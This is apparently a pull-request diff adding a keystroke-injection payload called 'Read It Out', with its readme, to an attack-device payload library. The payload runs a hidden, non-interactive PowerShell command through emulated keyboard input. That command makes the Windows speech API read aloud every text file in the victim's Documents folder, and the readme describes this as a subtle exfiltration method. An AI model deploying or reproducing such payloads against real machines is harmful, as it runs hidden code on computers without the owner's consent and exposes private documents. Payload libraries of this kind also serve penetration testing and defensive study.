New Payload - Read It Out (#444)

payloads/library/exfiltration/Win_PoSH_ReadItOut/payload.txt

@@ -0,0 +1,22 @@
+# Title:       Read It Out
+# Description: Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
+# Author:      Cribbit
+# Version:     1.0
+# Category:    Exfiltration
+# Target:      Windows (Powershell 5.1+)
+# Attackmodes: HID
+# Extensions:  Run
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID
+
+QUACK DELAY 500
+
+LED ATTACK
+
+RUN WIN "powershell -Noni -NoP -W h -C \"& {\$s=New-Object -ComObject SAPI.SPVoice; gci([Environment]::GetFolderPath('MyDocuments')) -file *.txt | % {\$s.Speak(\$(gc(\$_.FullName)))}}\""
+
+LED FINISH

payloads/library/exfiltration/Win_PoSH_ReadItOut/readme.md

@@ -0,0 +1,27 @@
+# Read It Out
+- Author: Cribbit
+- Version: 1.0
+- Target: Windows 10 (Powershell 5.1+)
+- Category: Exfiltration
+- Attackmode: HID
+- Extensions: Run
+
+## Change Log
+| Version | Changes         |
+| ------- | --------------- |
+| 1.0     | Initial release |
+
+## Description
+Super subtle exfiltration method.
+
+Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
+
+## Config
+Add -r to do subdirectorys
+
+## Colours
+| Status | Colour                        | Description                 |
+| ------ | ----------------------------- | --------------------------- |
+| SETUP  | Magenta solid                 | Setting attack mode         |
+| ATTACK | Yellow single blink           | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished          |